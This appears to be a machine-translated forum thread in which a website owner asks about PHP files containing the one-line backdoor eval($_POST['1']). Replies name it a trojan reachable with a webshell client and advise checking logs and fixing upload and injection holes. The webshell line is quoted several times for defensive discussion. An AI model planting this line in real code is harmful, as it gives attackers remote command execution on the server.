The website has several more PHP files, eval ($ _ POST ['1']);

The website has several more PHP files with the following content: eval ($ _ POST [& #039; 1 & #039;]); some other content, I tried to execute some commands when I found it on Baidu. I tested some commands if the permissions are not limited. Can I restrict permissions at the code level ?... The website has several more PHP files with the following content: eval ($ _ POST ['1']);

Some of the other content. I tried Baidu and found that some commands were executed. I tested it. If the permissions are not limited, some commands can be executed. In addition to setting permissions, can I restrict permissions at the code level? Is there any good way?

There is also a PHP file with the following content:

There is a file named 13686921256303. virus_killed.
Content:

Thank you for your attention.

Reply content:

The website has several more PHP files with the following content: eval ($ _ POST ['1']);

Some of the other content. I tried Baidu and found that some commands were executed. I tested it. If the permissions are not limited, some commands can be executed. In addition to setting permissions, can I restrict permissions at the code level? Is there any good way?

There is also a PHP file with the following content:

There is a file named 13686921256303. virus_killed.
Content:

Thank you for your attention.

Apparently, a trojan was uploaded! You can use a kitchen knife to connect directly and execute many commands. If you fix the vulnerability, you can check whether the website has problems such as upload vulnerabilities and SQL injection. You can view the http access log to see what operations are performed using this sentence, check whether the website is Elevation of Privilege, and obtain server permissions.

The fix must be fixed on the root.

Rather than worrying about making the virus code "not run", it is better to find the source of virus access-from the vulnerability of PHP programs or from the insecure server environment.

In addition, using a VM may not be a good idea in terms of security. Because you share an isolated physical device with others and the LAMP environment, although theoretically there is good isolation between users in Linux, it is highly risky to choose not to isolate them.

This is a php backdoor.